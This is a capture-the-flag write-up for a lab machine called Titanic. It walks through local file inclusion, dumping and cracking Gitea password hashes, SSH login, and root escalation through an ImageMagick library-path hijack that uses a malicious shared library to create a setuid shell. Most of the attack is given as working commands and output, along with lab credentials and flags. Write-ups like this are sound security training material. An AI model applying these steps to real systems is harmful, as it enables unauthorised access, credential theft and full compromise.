Titanic

Recon

nmap_scan.log

HTTP (80)

Only thing that works on website is Book Now

Writeup.png

Writeup-1.png

LFI

Writeup-2.png

We might be user developer since we can read the home files

Writeup-3.png

Server is apache and application is lives in /var/www/html

Writeup-4.png

Scratch that...

Writeup-5.png

Same config is inside /etc/apache2/sites-available/titanic.conf

../app.py to get app source code

/etc/hosts has another subdomain

Writeup-6.png

Dev Subdomain

Writeup-7.png

http://dev.titanic.htb/developer/flask-app/commit/f747049bc949526d9cd9bd45cfaeed6f6db92496http://dev.titanic.htb/developer/flask-app/commit/699639b37d9542cc26c3707a9dd9194f1cba4696

{"name": "Jack Dawson", "email": "jack.dawson@titanic.htb", "phone": "555-123-4567", "date": "2024-08-23", "cabin": "Standard"}
{"name": "Rose DeWitt Bukater", "email": "rose.bukater@titanic.htb", "phone": "643-999-021", "date": "2024-08-22", "cabin": "Suite"}

MySQL root password: MySQLP@$$w0rd!

Writeup-8.png

Gitea database can be dumped

Writeup-9.png

└─$ curl http://titanic.htb/download?ticket=/home/developer/gitea/data/gitea/gitea.db -so gitea.db
└─$ sqlitebrowser gitea.db

Convert to hashes

└─$ sqlite3 gitea.db "SELECT REPLACE(name || ':' || 'sha256:50000:' || BASE64(UNHEX(salt)) || ':' || BASE64(UNHEX(passwd)),CHAR(10),'') FROM user"
administrator:sha256:50000:LRSeX70bIM8x2z48aij8mw==:y6IMz5J9OtBWe2gWFzLT+8oJjOiGu8kjtAYqOWDUWcCNLfwGOyQGrJIHyYDEfF0BcTY=
developer:sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=

Crack developer password

➜ .\hashcat.exe -a 0 -m 10900 --user .\hashes.txt .\rockyou.txt
sha256:50000:i/PjRSt4VE+L7pQA1pNtNA==:5THTmJRhN7rqcO1qaApUOF7P8TEwnAvY8iXyhEBrfLyO/F2+8wvxaCYZJjRE6llM+1Y=:25282528

SSH (22)

└─$ sshpass -p '25282528' ssh developer@titanic.htb
developer@titanic:~$ id
uid=1000(developer) gid=1000(developer) groups=1000(developer)

User.txt

developer@titanic:~$ cat user.txt
33f47ac790d0e519063f99a3184c4c3c

Privilege Escalation

No sudo privs

developer@titanic:~$ sudo -l
Sorry, user developer may not run sudo on titanic.

Let this run to catch any cronjobs

└─$ sshpass -p '25282528' scp /opt/scripts/enum/pspy64 developer@titanic.htb:/tmp/pspy
└─$ sshpass -p '25282528' ssh developer@titanic.htb 'chmod +x /tmp/pspy'
└─$ sshpass -p '25282528' ssh developer@titanic.htb '/tmp/pspy'

We can't SSH into docker container without private key and 37409 is unknown service.

developer@titanic:~$ ss -tunlp4
Netid State  Recv-Q Send-Q   Local Address:Port    Peer Address:Port Process
udp   UNCONN 0      0        127.0.0.53%lo:53           0.0.0.0:*
udp   UNCONN 0      0              0.0.0.0:68           0.0.0.0:*
tcp   LISTEN 0      4096     127.0.0.53%lo:53           0.0.0.0:*
tcp   LISTEN 0      128          127.0.0.1:5000         0.0.0.0:*     users:(("python3",pid=1141,fd=3))
tcp   LISTEN 0      4096         127.0.0.1:3000         0.0.0.0:*
tcp   LISTEN 0      4096         127.0.0.1:37409        0.0.0.0:*
tcp   LISTEN 0      4096         127.0.0.1:2222         0.0.0.0:*
tcp   LISTEN 0      128            0.0.0.0:22           0.0.0.0:*

developer@titanic:~$ curl 0:37409/;echo
404: Page Not Found

There's some kind of script in /opt/scripts used to identify metadata of images..

developer@titanic:/opt/scripts$ ls -lAh
total 4.0K
-rwxr-xr-x 1 root root 167 Feb  3 17:11 identify_images.sh
developer@titanic:/opt/scripts$ cat identify_images.sh
cd /opt/app/static/assets/images
truncate -s 0 metadata.log
find /opt/app/static/assets/images/ -type f -name "*.jpg" | xargs /usr/bin/magick identify >> metadata.log

Yeap, it's cronjob

developer@titanic:/opt/app/static/assets/images$ ls -alh metadata.log
-rw-r----- 1 root developer 442 Feb 15 20:22 metadata.log
developer@titanic:/opt/app/static/assets/images$ ls -alh metadata.log
-rw-r----- 1 root developer 546 Feb 15 20:23 metadata.log

developer@titanic:/opt/app/static/assets/images$ magick --version
Version: ImageMagick 7.1.1-35 Q16-HDRI x86_64 1bfce2a62:20240713 https://imagemagick.org
Copyright: (C) 1999 ImageMagick Studio LLC
License: https://imagemagick.org/script/license.php
Features: Cipher DPC HDRI OpenMP(4.5)
Delegates (built-in): bzlib djvu fontconfig freetype heic jbig jng jp2 jpeg lcms lqr lzma openexr png raqm tiff webp x xml zlib
Compiler: gcc (9.4)

Arbitrary Code Execution in AppImage version ImageMagick

Env variables don't exist so it will default to current directory which we can hijack

developer@titanic:/opt/app/static/assets/images$ printenv | grep -E 'LD_LIBRARY_PATH|MAGICK_CONFIGURE_PATH'

gcc -x c -shared -fPIC -o ./libxcb.so.1 - << EOF
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
__attribute__((constructor)) void init(){ system("install -m4777 /bin/bash /tmp/rootbash"); exit(0); }
EOF

developer@titanic:/opt/app/static/assets/images$ ls -l /tmp/rootbash
ls: cannot access '/tmp/rootbash': No such file or directory
developer@titanic:/opt/app/static/assets/images$ ls -l /tmp/rootbash
-rwsrwxrwx 1 root root 1396520 Feb 15 20:34 /tmp/rootbash
developer@titanic:/opt/app/static/assets/images$ /tmp/rootbash -p
rootbash-5.1# id
uid=1000(developer) gid=1000(developer) euid=0(root) groups=1000(developer)

Root.txt

rootbash-5.1# cat /root/root.txt
fda3ebb9df0d6d6a09c689d76dc24d7b